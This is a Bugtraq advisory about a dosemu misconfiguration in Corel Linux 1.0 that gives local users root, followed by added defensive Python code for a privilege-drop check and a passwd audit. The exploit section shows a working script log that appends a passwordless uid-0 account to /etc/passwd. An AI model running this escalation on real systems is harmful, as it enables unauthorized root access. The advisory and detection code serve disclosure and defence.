Bugtraq mailing list archives

Corel Linux 1.0 dosemu default configuration: Local root vuln


From: suid () SUID KG (suid () SUID KG)
Date: Thu Mar 2 19:44:47 2000


Re all,

Hadn't seen this one around yet, has been on my site for about a week now.

Corel's mailserver bounced me about this IIRC? What's up, Corel?

Cheers.

----------------------------

suid () suid kg - Corel Linux dosemu config error. Local root compromise.

Software:       Corel Linux 1.0 dosemu distribution configuration
URL:            http://linux.corel.com
Version:        Version 1.0
Platforms:      Corel Linux only.
Type:           Default misconfiguration. No one reads the README anymore??

Summary:

        Local users can take advantage of a packaging and configuration
        error (which has been known and documented for a long time) to
        execute arbitrary commands as root.

        We see from the doc/README/SECURITY file as well as
        http://www.dosemu.org/docs/README/0.98/README-3.html
        written in 1997 that this configuration is bad.

Vulnerability:

        The system.com command is available to any user who runs the
        dos emulator. This is a direct violation of the advice from
        the SECURITY readme file:

                Never allow the 'system.com' command (part of dosemu)
                to be executed. It makes dosemu
                execute the libc 'system() function'. Though privileges
                are turned off, the process inherits the
                switched uid-setting (uid=root, euid=user), hence the
                unix process can use setreuid to gain root
                access back. ... the rest you can imagine yourself.

Exploit:

        This is a script log which details how to reproduce this:

        
                Script started on Fri Feb 25 13:54:00 2000
                nebula:~$ id
                uid=1000(suid) gid=1000(suid) groups=1000(suid)
                nebula:~$ cat > hack-corel
                #!/bin/bash
                echo "owned::0:0::/:/bin/bash" >> /etc/passwd
                ^D
                nebula:~$ chmod a+rx hack-corel
                nebula:~$ export PATH="$PATH:."
                nebula:~$ dos
                CPU speed set to 430/1 MHz
                Running on CPU=586, FPU=1, rdtsc=1

                        [ snip bunch of dosemu crap ]

                "Welcome to dosemu 0.98!
                C:\> system hack-corel;
                sh: : command not found
                C:\> exitERROR: general protection at 0x3f0ff: 0
                ERROR: SIGSEGV, protected insn...exiting!

                nebula:~$ tail -1 /etc/passwd
                owned::0:0::/:/bin/bash
                nebula:~$ su owned
                nebula:/home/suid# id
                uid=0(root) gid=0(root) groups=0(root)
                nebula:/home/suid# exit
                exit
                nebula:~$ exit

                Script done on Fri Feb 25 13:55:27 2000

Note:
        This is not a vulnerability in dosemu itself. The documentation
        warns users very specifically that this will happen if the system
        is configured as such.

Greets:

        duke
        cr
        active
        
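The SECURITY note quoted in the advisory describes a half-dropped state: the effective uid is the user, but the real (and saved) uid is still 0, so the process can switch back with setreuid(). The following check is added here as an example; it is not part of the original post and not dosemu code. It tells the half-dropped state apart from a real drop and shows the hardened pattern: set all three uids with setresuid() and then confirm the kernel refuses to hand uid 0 back. The fallback uid 65534 used when the checker itself runs as root is an assumption.

```python
import os


def is_half_dropped(ruid, euid, suid):
    """True when the effective uid is unprivileged but the real or saved uid
    is still 0: the state the dosemu SECURITY note describes (uid=root,
    euid=user), from which a process can restore euid=0 with setreuid()."""
    return euid != 0 and (ruid == 0 or suid == 0)


def drop_privileges_irrevocably(target_uid=None):
    """Set real, effective and saved uid to target_uid, then verify that the
    kernel refuses to give uid 0 back. Returns True only if both hold."""
    if target_uid is None:
        # Assumption: 65534 ("nobody" on most distributions) is a safe landing
        # uid when this runs as root; an unprivileged caller keeps its own uid.
        target_uid = os.getuid() if os.getuid() != 0 else 65534
    os.setresuid(target_uid, target_uid, target_uid)
    if os.getresuid() != (target_uid, target_uid, target_uid):
        return False
    try:
        os.setuid(0)          # must fail with EPERM once no uid is 0
    except PermissionError:
        return True
    return False              # root came back: privileges were not really dropped


if __name__ == "__main__":
    ruid, euid, suid = os.getresuid()
    print("current ids:", (ruid, euid, suid),
          "half-dropped:", is_half_dropped(ruid, euid, suid))
    print("irrevocable drop verified:", drop_privileges_irrevocably())
```

The point of the second function is the verification step: a privileged helper that only changes euid (or that changes ruid and euid but leaves the saved uid at 0) passes a naive "am I root?" check while still being able to return to uid 0, which is exactly the condition the exploit relies on.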

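The script log shows the artifact this attack leaves behind: an extra uid-0 entry with an empty password field appended to /etc/passwd. Added here as an example, not part of the original post: a small audit that parses passwd-format text and flags such entries. The sample input is constructed, modelled on the tail of /etc/passwd shown in the log; the allowed-root-names list defaults to just "root" and is an assumption to adjust per host.

```python
# Constructed sample, modelled on the /etc/passwd tail in the advisory's script log.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
suid:x:1000:1000:suid:/home/suid:/bin/bash
owned::0:0::/:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd-format text into dicts; lines that do not have the seven
    colon-separated fields or a numeric uid are reported as malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            entries.append({"line": lineno, "name": line, "malformed": True})
            continue
        name, password, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "password": password,
                        "uid": int(uid), "gid": gid, "home": home,
                        "shell": shell, "malformed": False})
    return entries


def find_rogue_root_accounts(text, allowed_root_names=("root",)):
    """Return (line number, account name, reason) for every entry that is
    uid 0 under an unexpected name or that has an empty password field."""
    findings = []
    for entry in parse_passwd(text):
        if entry["malformed"]:
            findings.append((entry["line"], entry["name"], "malformed entry"))
            continue
        reasons = []
        if entry["uid"] == 0 and entry["name"] not in allowed_root_names:
            reasons.append("uid 0 but not an allowed root account")
        if entry["password"] == "":
            reasons.append("empty password field")
        if reasons:
            findings.append((entry["line"], entry["name"], "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    # Audit the live file; fall back to the constructed sample if unreadable.
    try:
        with open("/etc/passwd") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_PASSWD
    for lineno, name, reason in find_rogue_root_accounts(text):
        print(f"line {lineno}: {name}: {reason}")
```

On the sample the audit reports only the "owned" line, for both reasons at once. On a system using shadow passwords an "x" in the second field is normal; an empty field means the account logs in with no password at all, which is why it is flagged separately from the uid-0 check.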
